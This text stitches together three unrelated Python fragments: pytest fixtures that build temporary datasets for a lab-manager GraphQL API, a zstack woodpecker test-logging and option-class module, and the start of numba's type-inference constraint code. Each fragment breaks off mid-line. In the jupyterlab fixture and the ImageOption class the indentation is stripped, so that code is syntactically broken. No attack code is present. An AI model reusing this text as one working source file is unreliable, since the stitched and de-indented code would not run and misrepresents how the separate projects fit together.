    app.config["LABMGR_CONFIG"] = config = Configuration()
    app.config["ID_MGR_CLS"] = get_identity_manager_class(config)

    with app.app_context():
        # within this block, current_app points to app. Set current user explicitly (this is done in the middleware)
        flask.g.user_obj = get_identity_manager_class(config)(config).get_user_profile()
        flask.g.access_token = "<PASSWORD>"
        flask.g.id_token = "<PASSWORD>"

        # Create a test client
        client = Client(schema, middleware=[DataloaderMiddleware(), RepositoryCacheMiddleware()],
                        context_value=ContextMock())

        yield config_instance, temp_dir, client, schema

    # Remove the temp_dir
    config_instance.clear_cached_configuration()
    shutil.rmtree(temp_dir)
@pytest.fixture(scope="class")
def fixture_working_dir_dataset_populated_scoped():
    """A pytest fixture that creates a temporary working directory, a config file to match, creates the schema,
    and populates the working dir with several datasets (plus negative-case repos).

    Class scope modifier attached.
    Yields (config_instance, temp_dir, graphene test client, schema).
    """
    # Create temp dir
    config_instance, temp_dir = _create_temp_work_dir()
    # Create user identity
    insert_cached_identity(config_instance.app_workdir)
    # Create test client
    schema = graphene.Schema(query=LabbookQuery, mutation=LabbookMutations)
    # Create a bunch of datasets. The 1.1s sleeps keep creation timestamps
    # distinct — presumably so list/sort/pagination queries see a stable
    # ordering (TODO confirm against the tests that consume this fixture).
    im = InventoryManager()
    im.create_dataset('default', 'default', "dataset2", storage_type="gigantum_object_v1", description="Cats 2")
    time.sleep(1.1)
    im.create_dataset('default', 'default', "dataset3", storage_type="gigantum_object_v1", description="Cats 3")
    time.sleep(1.1)
    im.create_dataset('default', 'default', "dataset4", storage_type="gigantum_object_v1", description="Cats 4")
    time.sleep(1.1)
    im.create_dataset('default', 'default', "dataset5", storage_type="gigantum_object_v1", description="Cats 5")
    time.sleep(1.1)
    im.create_dataset('default', 'default', "dataset6", storage_type="gigantum_object_v1", description="Cats 6")
    time.sleep(1.1)
    im.create_dataset('default', 'default', "dataset7", storage_type="gigantum_object_v1", description="Cats 7")
    time.sleep(1.1)
    im.create_dataset('default', 'default', "dataset8", storage_type="gigantum_object_v1", description="Cats 8")
    time.sleep(1.1)
    im.create_dataset('default', 'default', "dataset9", storage_type="gigantum_object_v1", description="Cats 9")
    time.sleep(1.1)
    # Repos under a different owner/user — presumably negative cases that
    # listing queries must filter out (confirm in consuming tests).
    im.create_dataset('default', 'test3', "dataset-other", storage_type="gigantum_object_v1", description="Cats other")
    time.sleep(1.1)
    im.create_labbook('test3', 'test3', "labbook-0", description="This should not show up.")
    # 'dataset1' is created last, so it carries the newest timestamp.
    im.create_dataset('default', 'default', "dataset1", storage_type="gigantum_object_v1", description="Cats 1")
    time.sleep(1.1)
    # Flush Redis cache for Repo info
    DatasetCacheController().clear_all()
    # Load User identity into app context
    app = Flask("lmsrvlabbook")
    app.config["LABMGR_CONFIG"] = config = Configuration()
    app.config["ID_MGR_CLS"] = get_identity_manager_class(config)
    with app.app_context():
        # within this block, current_app points to app. Set current user explicitly (this is done in the middleware)
        flask.g.user_obj = get_identity_manager_class(config)(config).get_user_profile()
        # Placeholder tokens; real values are injected by auth middleware in production.
        flask.g.access_token = "<PASSWORD>"
        flask.g.id_token = "<PASSWORD>"
        # Create a test client
        client = Client(schema, middleware=[DataloaderMiddleware(), RepositoryCacheMiddleware()],
                        context_value=ContextMock())
        # Yield inside the app context so tests run with flask.g populated.
        yield config_instance, temp_dir, client, schema
    # Teardown: drop cached configuration and remove the temp working dir.
    config_instance.clear_cached_configuration()
    shutil.rmtree(temp_dir)
@pytest.fixture
def fixture_single_dataset():
    """A pytest fixture that creates a temporary working directory, a config file to match,
    creates the schema, and populates the working dir with one dataset whose file cache
    holds a handful of test files.

    Function scoped (note: an earlier copy of this docstring claimed class scope).
    Yields (config_instance, temp_dir, graphene test client, dataset, cache manager).
    """
    # Create temp dir
    config_instance, temp_dir = _create_temp_work_dir()
    # Create user identity
    insert_cached_identity(config_instance.app_workdir)
    # Create test client
    schema = graphene.Schema(query=LabbookQuery, mutation=LabbookMutations)
    # Create a single dataset and seed its file cache at the current git revision.
    im = InventoryManager()
    ds = im.create_dataset('default', 'default', "test-dataset", storage_type="gigantum_object_v1", description="Cats 2")
    m = Manifest(ds, 'default')
    cm_class = get_cache_manager_class(ds.client_config)
    cache_mgr = cm_class(ds, 'default')
    revision = ds.git.repo.head.commit.hexsha
    os.makedirs(os.path.join(cache_mgr.cache_root, revision, "other_dir"))
    helper_append_file(cache_mgr.cache_root, revision, "test1.txt", "asdfasdf")
    helper_append_file(cache_mgr.cache_root, revision, "test2.txt", "rtg")
    helper_append_file(cache_mgr.cache_root, revision, "test3.txt", "wer")
    helper_append_file(cache_mgr.cache_root, revision, "other_dir/test4.txt", "dfasdfhfgjhg")
    helper_append_file(cache_mgr.cache_root, revision, "other_dir/test5.txt", "fdghdfgsa")
    # Sync the manifest with the files written above.
    m.update()
    # Load User identity into app context
    app = Flask("lmsrvlabbook")
    app.config["LABMGR_CONFIG"] = config = Configuration()
    app.config["ID_MGR_CLS"] = get_identity_manager_class(config)
    with app.app_context():
        # within this block, current_app points to app. Set current user explicitly (this is done in the middleware)
        flask.g.user_obj = get_identity_manager_class(config)(config).get_user_profile()
        # Placeholder tokens; real values are injected by auth middleware in production.
        flask.g.access_token = "<PASSWORD>"
        flask.g.id_token = "<PASSWORD>"
        # Create a test client
        client = Client(schema, middleware=[DataloaderMiddleware(), RepositoryCacheMiddleware()], context_value=ContextMock())
        yield config_instance, temp_dir, client, ds, cache_mgr
    # Teardown: drop cached configuration and remove the temp working dir.
    config_instance.clear_cached_configuration()
    shutil.rmtree(temp_dir)
@pytest.fixture(scope='class')
def build_image_for_jupyterlab():
# Create temp dir
config_instance, temp_dir = _create_temp_work_dir()
# Create user identity
insert_cached_identity(config_instance.app_workdir)
# Create test client
schema = graphene.Schema(query=LabbookQuery, mutation=LabbookMutations)
# get environment data and index
erm = RepositoryManager()
erm.update_repositories()
erm.index_repositories()
# Load User identity into app context
app = | |
'''
@author: Frank
'''
import os
import time
import string
import sys
import traceback
import string
import zstacklib.utils.xmlobject as xmlobject
import apibinding.inventory as inventory
import zstackwoodpecker.action_select as action_select
# Visual separators and line prefixes used when composing console output and
# the case action log.
minus_split = '-'*10 + '\n'
action_break = '\n' + '-'*10 + '\n'
log_prefix = ' <Log>'
action_prefix = '\n <<Action>>'
dsc_prefix = '\n ##'
warn_prefix = '\n !!WARN!!'
class TestError(Exception):
    '''Generic zstack woodpecker test failure; raised by test_fail() and friends.'''
def raise_exeception_no_cleanup(msg):
    '''Fail the case like test_fail(), but ask the framework to skip error cleanup.

    The (misspelled) name is kept for backward compatibility with callers.
    '''
    # os.environ values must be strings: assigning the bool True raises
    # TypeError (putenv requires a string) before TestError is ever raised.
    os.environ['WOODPECKER_NO_ERROR_CLEANUP'] = 'True'
    raise TestError(msg)
def write_to_action_log(msg):
    '''Append msg (plus a newline) to the case action log file.

    The log path comes from the WOODPECKER_CASE_ACTION_LOG_PATH environment
    variable; when it is unset the call is a silent no-op returning False.
    '''
    case_action_log = os.environ.get('WOODPECKER_CASE_ACTION_LOG_PATH')
    if not case_action_log:
        return False
    # 'with' guarantees the descriptor is closed even when the write raises;
    # the previous try/except re-raised before reaching fd.close(), leaking
    # the open file on failure.
    with open(case_action_log, 'a+') as fd:
        fd.write(msg + '\n')
#Record test warning
def test_warn(msg):
    '''Print a warning banner and append it to the case action log
    (unless WOODPECKER_ONLY_ACTION_LOG suppresses it).'''
    print_msg = '[CASE WARN]:\n%s %s \n%s' % (minus_split, msg, minus_split)
    print(print_msg)
    log_time = time.ctime().split()[3]
    # The old code assigned action_msg twice; only the second assignment
    # (without the trailing newline) ever took effect, so the dead first
    # assignment was removed.
    action_msg = '%s %s [%s]' % (warn_prefix, msg, log_time)
    only_action_log = os.environ.get('WOODPECKER_ONLY_ACTION_LOG')
    if not only_action_log:
        write_to_action_log(action_msg)
#Record Test Log
def test_logger(msg):
    '''Print a case-log banner and append the entry to the case action log
    (unless WOODPECKER_ONLY_ACTION_LOG suppresses it).'''
    log_time = time.ctime().split()[3]
    print_msg = '[CASE LOG]: %s\n%s %s \n%s' % (log_time, minus_split, msg, minus_split)
    print(print_msg)
    # The old code assigned action_msg twice; only the second assignment
    # (without the trailing newline) ever took effect, so the dead first
    # assignment was removed.
    action_msg = '%s %s [%s]' % (log_prefix, msg, log_time)
    only_action_log = os.environ.get('WOODPECKER_ONLY_ACTION_LOG')
    if not only_action_log:
        write_to_action_log(action_msg)
#Record Test Result
def test_result(msg):
    '''Print the case result banner and always record it in the action log.'''
    banner = '[CASE RESULT]:\n%s %s \n%s' % (minus_split, msg, minus_split)
    print(banner)
    stamp = time.ctime().split()[3]
    entry = '%s<Result> %s [%s]' % (action_break, msg, stamp)
    write_to_action_log(entry)
def test_fail(msg, no_cleanup = False):
    '''
    Record a failed result and raise TestError.

    No test case codes will be executed, after calling this function.
    When no_cleanup is truthy, ask the framework to skip error cleanup.
    '''
    test_logger(msg)
    test_result("Failed :(")
    if no_cleanup:
        # os.environ values must be strings; the old code assigned the bool
        # True, which raises TypeError before TestError could be raised.
        os.environ['WOODPECKER_NO_ERROR_CLEANUP'] = 'True'
    raise TestError(msg)
def test_pass(msg):
    '''
    Record a passing result and terminate the process with exit code 0.

    No test case codes will be executed, after calling this function.
    '''
    test_logger(msg)
    test_result("Pass :)")
    sys.exit(0)
def test_skip(msg):
    '''
    Record a skipped result and terminate the process with exit code 2.

    No test case codes will be executed, after calling this function.
    '''
    test_logger(msg)
    test_result("Skipped")
    sys.exit(2)
#Record Action Log
def action_logger(msg):
    '''Print an action banner and always append the entry to the action log.'''
    banner = '[ACTION LOG]:\n%s %s \n%s' % (minus_split, msg, minus_split)
    print(banner)
    stamp = time.ctime().split()[3]
    entry = '%s %s [%s]\n' % (action_prefix, msg, stamp)
    write_to_action_log(entry)
#Test description
def test_dsc(msg):
    '''Print the test description banner and always record it in the action log.'''
    banner = '[Test DSC]:\n%s %s \n%s' % (minus_split, msg, minus_split)
    print(banner)
    entry = '%s %s\n' % (dsc_prefix, msg)
    write_to_action_log(entry)
class TestConfig(object):
    '''Loads woodpecker's test-config.xml and the deploy config it points at.'''

    def __init__(self, config_path):
        self.config_path = config_path
        if not config_path:
            raise TestError('Test config file (test-config.xml) path is not set')
        # Relative paths inside the config resolve against its directory.
        self.config_base_path = os.path.dirname(os.path.abspath(config_path))
        self.deploy_config_template_path = None

    def _full_path(self, path):
        '''Expand path to absolute: honor '~', keep absolutes, else join the
        config file's directory.'''
        if path.startswith('~'):
            return os.path.expanduser(path)
        elif path.startswith('/'):
            return path
        else:
            return os.path.join(self.config_base_path, path)

    def get_test_config(self):
        '''Parse test-config.xml into an xmlobject tree and return it.'''
        cfg_path = os.path.abspath(self.config_path)
        with open(cfg_path, 'r') as fd:
            xmlstr = fd.read()
        # NOTE: the explicit fd.close() the old code called inside the 'with'
        # block was redundant; the context manager closes the file.
        config = xmlobject.loads(xmlstr)
        return config

    def get_deploy_config(self):
        '''Load the deploy config xml, resolving the template it must reference.

        Raises TestError when <deployConfigTemplate> is missing or either file
        does not exist.
        '''
        config = self.get_test_config()
        deploy_config_template_path = config.get('deployConfigTemplate')
        if deploy_config_template_path:
            deploy_config_template_path = self._full_path(deploy_config_template_path)
            if not os.path.exists(deploy_config_template_path):
                raise TestError('unable to find %s' % deploy_config_template_path)
            self.deploy_config_template_path = deploy_config_template_path
        else:
            raise TestError('not define test deploy config xml file by <deployConfigTemplate> in: %s' % self.config_path)
        deploy_config_path = self._full_path(config.deployConfig.text_)
        if not os.path.exists(deploy_config_path):
            raise TestError('unable to find %s' % deploy_config_path)
        # At this point a missing template has already raised, so the old
        # 'if deploy_config_template_path:' re-check (and its dead else branch
        # calling build_deploy_xmlobject_from_configure without a template)
        # was unreachable and has been removed.
        deploy_config = build_deploy_xmlobject_from_configure(deploy_config_path, deploy_config_template_path)
        deploy_config.put_attr('deployConfigTemplatePath', deploy_config_template_path)
        deploy_config.put_attr('deployConfigPath', deploy_config_path)
        return deploy_config

    def expose_config_variable(self):
        '''Export variables defined in the deploy config template to os.environ.'''
        if self.deploy_config_template_path:
            set_env_var_from_config_template(self.deploy_config_template_path)
class DataOption(object):
    '''Base holder for options common to the zstack API helpers: session,
    timeout, name and description.'''

    def __init__(self):
        self.session_uuid = None
        self.timeout = 300000  # default API timeout: 5 minutes, in milliseconds
        self.name = None
        self.description = None

    def set_name(self, name):
        self.name = name

    def get_name(self):
        return self.name

    def set_description(self, description):
        self.description = description

    def get_description(self):
        return self.description

    def set_session_uuid(self, session_uuid):
        self.session_uuid = session_uuid

    def get_session_uuid(self):
        return self.session_uuid

    def set_timeout(self, timeout):
        self.timeout = timeout

    def get_timeout(self):
        return self.timeout
class ClusterOption(DataOption):
    '''Options for creating a cluster; type defaults to 'zstack'.'''

    def __init__(self):
        self.type = 'zstack'
        self.hypervisor_type = None
        super(ClusterOption, self).__init__()

    def set_hypervisor_type(self, hypervisor_type):
        self.hypervisor_type = hypervisor_type

    def get_hypervisor_type(self):
        return self.hypervisor_type

    def set_type(self, type):
        self.type = type

    def get_type(self):
        return self.type
class IpRangeOption(DataOption):
    '''Options describing an IP range (start/end, gateway, netmask) on an L3 network.'''

    def __init__(self):
        self.l3_uuid = None
        self.startIp = None
        self.endIp = None
        self.gateway = None
        self.netmask = None
        super(IpRangeOption, self).__init__()

    def set_l3_uuid(self, l3_uuid):
        self.l3_uuid = l3_uuid

    def get_l3_uuid(self):
        return self.l3_uuid

    def set_startIp(self, startIp):
        self.startIp = startIp

    def get_startIp(self):
        return self.startIp

    def set_endIp(self, endIp):
        self.endIp = endIp

    def get_endIp(self):
        return self.endIp

    def set_gateway(self, gateway):
        self.gateway = gateway

    def get_gateway(self):
        return self.gateway

    def set_netmask(self, netmask):
        self.netmask = netmask

    def get_netmask(self):
        return self.netmask
class VipOption(DataOption):
    '''Options for creating a VIP on an L3 network.'''

    def __init__(self):
        self.l3_uuid = None
        self.allocateStrategy = None
        super(VipOption, self).__init__()

    def set_l3_uuid(self, l3_uuid):
        self.l3_uuid = l3_uuid

    def get_l3_uuid(self):
        return self.l3_uuid

    def set_allocateStrategy(self, strategy):
        self.allocateStrategy = strategy

    def get_allocateStrategy(self):
        return self.allocateStrategy
class PrimaryStorageOption(DataOption):
    '''Options for adding a primary storage to a zone.'''

    def __init__(self):
        self.type = None
        self.url = None
        self.zone_uuid = None
        super(PrimaryStorageOption, self).__init__()

    def set_type(self, type):
        self.type = type

    def get_type(self):
        return self.type

    def set_url(self, url):
        self.url = url

    def get_url(self):
        return self.url

    def set_zone_uuid(self, zone_uuid):
        self.zone_uuid = zone_uuid

    def get_zone_uuid(self):
        return self.zone_uuid
class CephPrimaryStorageOption(PrimaryStorageOption):
    '''Primary storage options specific to Ceph: monitor URLs and pool names.'''

    def __init__(self):
        self.monUrls = None
        self.imageCachePoolName = None
        self.dataVolumePoolName = None
        self.rootVolumePoolName = None
        super(CephPrimaryStorageOption, self).__init__()
        # Force the storage type after the parent init cleared it.
        self.type = inventory.CEPH_PRIMARY_STORAGE_TYPE

    def set_monUrls(self, monUrls):
        self.monUrls = monUrls

    def get_monUrls(self):
        return self.monUrls

    def set_imageCachePoolName(self, imageCachePoolName):
        self.imageCachePoolName = imageCachePoolName

    def get_imageCachePoolName(self):
        return self.imageCachePoolName

    def set_dataVolumePoolName(self, dataVolumePoolName):
        self.dataVolumePoolName = dataVolumePoolName

    def get_dataVolumePoolName(self):
        return self.dataVolumePoolName

    def set_rootVolumePoolName(self, rootVolumePoolName):
        self.rootVolumePoolName = rootVolumePoolName

    def get_rootVolumePoolName(self):
        return self.rootVolumePoolName
class DiskOfferingOption(DataOption):
    '''Options for creating a disk offering (size, allocator strategy, type).'''

    def __init__(self):
        self.diskSize = None
        self.allocatorStrategy = None
        self.type = None
        super(DiskOfferingOption, self).__init__()

    def set_diskSize(self, diskSize):
        self.diskSize = diskSize

    def get_diskSize(self):
        return self.diskSize

    def set_allocatorStrategy(self, allocatorStrategy):
        self.allocatorStrategy = allocatorStrategy

    def get_allocatorStrategy(self):
        return self.allocatorStrategy

    def set_type(self, type):
        self.type = type

    def get_type(self):
        return self.type
class InstanceOfferingOption(DataOption):
    '''Options for creating an instance offering (CPU, memory, strategy, type).'''

    def __init__(self):
        self.cpuNum = None
        self.cpuSpeed = None
        self.memorySize = None
        self.allocatorStrategy = None
        self.type = None
        super(InstanceOfferingOption, self).__init__()

    def set_cpuNum(self, cpuNum):
        self.cpuNum = cpuNum

    def get_cpuNum(self):
        return self.cpuNum

    def set_cpuSpeed(self, cpuSpeed):
        self.cpuSpeed = cpuSpeed

    def get_cpuSpeed(self):
        return self.cpuSpeed

    def set_memorySize(self, memorySize):
        self.memorySize = memorySize

    def get_memorySize(self):
        return self.memorySize

    def set_allocatorStrategy(self, allocatorStrategy):
        self.allocatorStrategy = allocatorStrategy

    def get_allocatorStrategy(self):
        return self.allocatorStrategy

    def set_type(self, type):
        self.type = type

    def get_type(self):
        return self.type
class VmOption(DataOption):
    '''Options for creating a VM instance.

    May be constructed empty or as a copy of another VmOption (vm_opt).
    '''

    def __init__(self, vm_opt = None):
        if not vm_opt:
            self.l3_uuids = None
            self.image_uuid = None
            self.instance_offering_uuid = None
            self.vm_type = None
            self.host_uuid = None
            self.cluster_uuid = None
            self.zone_uuid = None
            self.data_disk_uuids = None
            self.default_l3_uuid = None
            self.root_disk_uuid = None
            #system tag is an array
            self.system_tags = None
            self.user_tags = None
            super(VmOption, self).__init__()
        else:
            # Copy constructor. NOTE(review): root_disk_uuid is deliberately
            # reset to None instead of copied — confirm this is intended.
            self.l3_uuids = vm_opt.get_l3_uuids()
            self.image_uuid = vm_opt.get_image_uuid()
            self.instance_offering_uuid = vm_opt.get_instance_offering_uuid()
            self.vm_type = vm_opt.get_vm_type()
            self.host_uuid = vm_opt.get_host_uuid()
            self.cluster_uuid = vm_opt.get_cluster_uuid()
            self.zone_uuid = vm_opt.get_zone_uuid()
            self.data_disk_uuids = vm_opt.get_data_disk_uuids()
            self.root_disk_uuid = None
            self.set_name(vm_opt.get_name())
            self.set_description(vm_opt.get_description())
            self.set_timeout(vm_opt.get_timeout())
            self.default_l3_uuid = vm_opt.get_default_l3_uuid()
            self.system_tags = vm_opt.get_system_tags()
            self.user_tags = vm_opt.get_user_tags()
            super(VmOption, self).__init__()

    def set_l3_uuids(self, l3_uuids):
        if not isinstance(l3_uuids, list):
            raise TestError('l3_uuids is not a list.')
        self.l3_uuids = l3_uuids

    def get_l3_uuids(self):
        return self.l3_uuids

    def set_system_tags(self, system_tags):
        if not system_tags:
            self.system_tags = []
            return
        if not isinstance(system_tags, list):
            raise TestError('system_tags is not a list.')
        self.system_tags = system_tags

    def get_system_tags(self):
        return self.system_tags

    def set_user_tags(self, user_tags):
        # Bug fix: the old code tested the misspelled name 'user_tages',
        # which raised NameError on every call.
        if not user_tags:
            self.user_tags = []
            return
        if not isinstance(user_tags, list):
            raise TestError('user_tags is not a list.')
        self.user_tags = user_tags

    def get_user_tags(self):
        return self.user_tags

    def set_default_l3_uuid(self, l3_uuid):
        self.default_l3_uuid = l3_uuid

    def get_default_l3_uuid(self):
        return self.default_l3_uuid

    def set_root_disk_uuid(self, disk_uuid):
        self.root_disk_uuid = disk_uuid

    def get_root_disk_uuid(self):
        return self.root_disk_uuid

    def set_zone_uuid(self, zone_uuid):
        self.zone_uuid = zone_uuid

    def get_zone_uuid(self):
        return self.zone_uuid

    def set_image_uuid(self, image_uuid):
        self.image_uuid = image_uuid

    def get_image_uuid(self):
        return self.image_uuid

    def set_cluster_uuid(self, cluster_uuid):
        self.cluster_uuid = cluster_uuid

    def get_cluster_uuid(self):
        return self.cluster_uuid

    def set_host_uuid(self, host_uuid):
        self.host_uuid = host_uuid

    def get_host_uuid(self):
        return self.host_uuid

    def set_instance_offering_uuid(self, instance_offering_uuid):
        self.instance_offering_uuid = instance_offering_uuid

    def get_instance_offering_uuid(self):
        return self.instance_offering_uuid

    def set_vm_type(self, vm_type):
        self.vm_type = vm_type

    def get_vm_type(self):
        return self.vm_type

    def set_data_disk_uuids(self, data_disk_uuids):
        self.data_disk_uuids = data_disk_uuids

    def get_data_disk_uuids(self):
        return self.data_disk_uuids
class VolumeOption(DataOption):
    '''Options for creating a data volume or adding one from a URL.'''

    def __init__(self):
        self.disk_offering_uuid = None  # used when creating a volume from a template
        self.url = None  # used when adding a volume from a URL
        self.volume_type = None  # used when adding a volume from a URL
        self.backup_storage_uuid_list = []  # used when adding a volume from a URL
        super(VolumeOption, self).__init__()

    def set_disk_offering_uuid(self, disk_offering_uuid):
        self.disk_offering_uuid = disk_offering_uuid

    def get_disk_offering_uuid(self):
        return self.disk_offering_uuid

    def set_backup_storage_uuid_list(self, backup_storage_uuid_list):
        self.backup_storage_uuid_list = backup_storage_uuid_list

    def get_backup_storage_uuid_list(self):
        return self.backup_storage_uuid_list

    def set_url(self, url):
        self.url = url

    def get_url(self):
        return self.url

    def set_volume_type(self, volume_type):
        self.volume_type = volume_type

    def get_volume_type(self):
        return self.volume_type
class ImageOption(DataOption):
def __init__(self):
self.root_volume_uuid = None #for create template from root volume
self.backup_storage_uuid_list = [] #
self.guest_os_type = None #CentOS7
self.platform = None #Linux, Windows, Unknown
self.bits = None #64/32
self.url = None #http:// for add a new image
self.mediaType = None #Template, ISO
self.format = None #qcow/raw for KVM, simulator,
self.system = None #used for system image
super(ImageOption, self).__init__()
def set_root_volume_uuid(self, root_volume_uuid):
self.root_volume_uuid = root_volume_uuid
def get_root_volume_uuid(self):
return self.root_volume_uuid
def set_backup_storage_uuid_list(self, backup_storage_uuid_list):
self.backup_storage_uuid_list = backup_storage_uuid_list
def get_backup_storage_uuid_list(self):
return self.backup_storage_uuid_list
def set_guest_os_type(self, guest_os_type):
self.guest_os_type = guest_os_type
| |
<filename>numba/typeinfer.py
"""
Type inference base on CPA.
The algorithm guarantees monotonic growth of type-sets for each variable.
Steps:
1. seed initial types
2. build constrains
3. propagate constrains
4. unify types
Constrain propagation is precise and does not regret (no backtracing).
Constrains push types forward following the dataflow.
"""
from __future__ import print_function, division, absolute_import
from pprint import pprint
import itertools
from numba import ir, types, utils, config, six
from numba.config import PYVERSION
from numba.utils import builtins
# Builtin callables that produce range-style iterators; on Python 2 the lazy
# xrange builtin counts as well.
RANGE_ITER_OBJECTS = (builtins.range,)
if PYVERSION < (3, 0):
    RANGE_ITER_OBJECTS += (builtins.xrange,)
class TypingError(Exception):
    """Raised when type inference cannot produce a consistent typing."""

    def __init__(self, msg, loc=None):
        self.msg = msg
        self.loc = loc
        # Include the source location in the message when one is available.
        if loc:
            text = "%s\n%s" % (msg, loc.strformat())
        else:
            text = "%s" % (msg,)
        super(TypingError, self).__init__(text)
class TypeVar(object):
    """Grow-only set of candidate types for a single IR variable.

    Once locked, the set is pinned to exactly one type and later additions
    must be convertible to it.
    """

    def __init__(self, context, var):
        self.context = context
        self.var = var
        self.typeset = set()
        self.locked = False

    def add_types(self, *new_types):
        if not new_types:
            return
        # Reject None early: it is never a valid type.
        for ty in new_types:
            if ty is None:
                raise TypeError("Using None as variable type")
        size_before = len(self.typeset)
        if self.locked:
            if set(new_types) != self.typeset:
                [expect] = list(self.typeset)
                for ty in new_types:
                    if self.context.type_compatibility(ty, expect) is None:
                        raise TypingError("No conversion from %s to %s for "
                                          "'%s'" % (ty, expect, self.var))
        else:
            self.typeset.update(new_types)
        assert size_before <= len(self.typeset), "Must grow monotonically"

    def lock(self, typ):
        if self.locked:
            [expect] = list(self.typeset)
            if self.context.type_compatibility(typ, expect) is None:
                raise TypingError("No conversion from %s to %s for "
                                  "'%s'" % (typ, expect, self.var))
        else:
            self.typeset = set([typ])
            self.locked = True

    def union(self, other):
        self.add_types(*other.typeset)

    def __repr__(self):
        return '%s := {%s}' % (self.var, ', '.join(map(str, self.typeset)))

    def get(self):
        return tuple(self.typeset)

    def getone(self):
        assert len(self) == 1, self.typeset
        return tuple(self.typeset)[0]

    def __len__(self):
        return len(self.typeset)
class ConstrainNetwork(object):
    """Holds every registered constrain and applies them to the typevar map.

    TODO: propagation could be limited to dirty type variables only.
    """

    def __init__(self):
        self.constrains = []

    def append(self, constrain):
        self.constrains.append(constrain)

    def propagate(self, context, typevars):
        for con in self.constrains:
            try:
                con(context, typevars)
            except TypingError:
                # Already a user-facing typing failure; let it bubble up.
                raise
            except Exception as e:
                # Anything else is an internal bug; wrap it with the
                # offending constrain and its source location.
                wrapped = "Internal error at {con}:\n{err}".format(con=con, err=e)
                raise TypingError(wrapped, loc=con.loc)
class Propagate(object):
    """Assignment constrain: the destination's typeset absorbs the source's."""

    def __init__(self, dst, src, loc):
        self.dst = dst
        self.src = src
        self.loc = loc

    def __call__(self, context, typevars):
        src_tv = typevars[self.src]
        typevars[self.dst].union(src_tv)
class BuildTupleConstrain(object):
    """Types a tuple construction: homogeneous inputs yield a UniTuple,
    mixed inputs a Tuple."""

    def __init__(self, target, items, loc):
        self.target = target
        self.items = items
        self.loc = loc

    def __call__(self, context, typevars):
        item_sets = [typevars[it.name].get() for it in self.items]
        out = typevars[self.target]
        for combo in itertools.product(*item_sets):
            if all(combo[0] == v for v in combo):
                tup = types.UniTuple(dtype=combo[0], count=len(combo))
            else:
                tup = types.Tuple(combo)
            out.add_types(tup)
class ExhaustIterConstrain(object):
    """Types full unpacking of an iterator into a fixed number of values."""

    def __init__(self, target, count, iterator, loc):
        self.target = target
        self.count = count
        self.iterator = iterator
        self.loc = loc

    def __call__(self, context, typevars):
        out = typevars[self.target]
        for ty in typevars[self.iterator.name].get():
            if isinstance(ty, types.IterableType):
                out.add_types(types.UniTuple(dtype=ty.iterator_type.yield_type,
                                             count=self.count))
            elif isinstance(ty, types.Tuple):
                out.add_types(ty)
class PairFirstConstrain(object):
    """Types extraction of the first element of a Pair value."""

    def __init__(self, target, pair, loc):
        self.target = target
        self.pair = pair
        self.loc = loc

    def __call__(self, context, typevars):
        out = typevars[self.target]
        for ty in typevars[self.pair.name].get():
            if not isinstance(ty, types.Pair):
                # XXX is this an error?
                continue
            out.add_types(ty.first_type)
class PairSecondConstrain(object):
    """Types extraction of the second element of a Pair value."""

    def __init__(self, target, pair, loc):
        self.target = target
        self.pair = pair
        self.loc = loc

    def __call__(self, context, typevars):
        out = typevars[self.target]
        for ty in typevars[self.pair.name].get():
            if not isinstance(ty, types.Pair):
                # XXX is this an error?
                continue
            out.add_types(ty.second_type)
class StaticGetItemConstrain(object):
    """Types indexing with a compile-time-constant index into a tuple value."""

    def __init__(self, target, value, index, loc):
        self.target = target
        self.value = value
        self.index = index
        self.loc = loc

    def __call__(self, context, typevars):
        out = typevars[self.target]
        for ty in typevars[self.value.name].get():
            if isinstance(ty, types.UniTuple):
                out.add_types(ty.dtype)
            elif isinstance(ty, types.Tuple):
                out.add_types(ty.types[self.index])
class CallConstrain(object):
    """Constrain for calling functions.

    Performs case analysis for each combination of argument types.
    """

    def __init__(self, target, func, args, kws, loc):
        self.target = target
        self.func = func
        self.args = args
        self.kws = kws
        self.loc = loc

    def __call__(self, context, typevars):
        fnty = typevars[self.func].getone()
        self.resolve(context, typevars, fnty)

    def resolve(self, context, typevars, fnty):
        assert not self.kws, "Keyword argument is not supported, yet"
        assert fnty
        argtypes = [typevars[a.name].get() for a in self.args]
        restypes = []
        # Resolve a signature for every combination of argument types.
        for combo in itertools.product(*argtypes):
            # TODO handling keyword arguments
            sig = context.resolve_function_type(fnty, combo, ())
            if sig is None:
                msg = "Undeclared %s%s" % (fnty, combo)
                raise TypingError(msg, loc=self.loc)
            restypes.append(sig.return_type)
        typevars[self.target].add_types(*restypes)
class IntrinsicCallConstrain(CallConstrain):
    """Call constrain whose callee type is the stored intrinsic itself."""

    def __call__(self, context, typevars):
        self.resolve(context, typevars, fnty=self.func)
class GetAttrConstrain(object):
    """Constrain typing an attribute load ``value.attr``."""

    def __init__(self, target, attr, value, loc, inst):
        self.target = target
        self.attr = attr
        self.value = value
        self.loc = loc
        self.inst = inst

    def __call__(self, context, typevars):
        restypes = []
        for ty in typevars[self.value.name].get():
            try:
                attrty = context.resolve_getattr(value=ty, attr=self.attr)
            except KeyError:
                args = (self.attr, ty, self.value.name, self.inst)
                msg = "Unknown attribute '%s' for %s %s %s" % args
                raise TypingError(msg, loc=self.inst.loc)
            else:
                assert attrty
                restypes.append(attrty)
        typevars[self.target].add_types(*restypes)

    def __repr__(self):
        return 'resolving type of attribute "{attr}" of "{value}"'.format(
            value=self.value, attr=self.attr)
class SetItemConstrain(object):
    """Checks that ``target[index] = value`` is resolvable for every typing."""

    def __init__(self, target, index, value, loc):
        self.target = target
        self.index = index
        self.value = value
        self.loc = loc

    def __call__(self, context, typevars):
        targettys = typevars[self.target.name].get()
        idxtys = typevars[self.index.name].get()
        valtys = typevars[self.value.name].get()
        for tgt, idx, val in itertools.product(targettys, idxtys, valtys):
            if not context.resolve_setitem(target=tgt, index=idx, value=val):
                raise TypingError("Cannot resolve setitem: %s[%s] = %s" %
                                  (tgt, idx, val), loc=self.loc)
class SetAttrConstrain(object):
    """Checks that ``target.attr = value`` is resolvable for every typing."""

    def __init__(self, target, attr, value, loc):
        self.target = target
        self.attr = attr
        self.value = value
        self.loc = loc

    def __call__(self, context, typevars):
        targettys = typevars[self.target.name].get()
        valtys = typevars[self.value.name].get()
        for tgt, val in itertools.product(targettys, valtys):
            if not context.resolve_setattr(target=tgt, attr=self.attr,
                                           value=val):
                raise TypingError("Cannot resolve setattr: (%s).%s = %s" %
                                  (tgt, self.attr, val), loc=self.loc)
class TypeVarMap(dict):
    """dict of variable name -> TypeVar that lazily creates missing entries
    and forbids redefining an existing one."""

    def set_context(self, context):
        self.context = context

    def __getitem__(self, name):
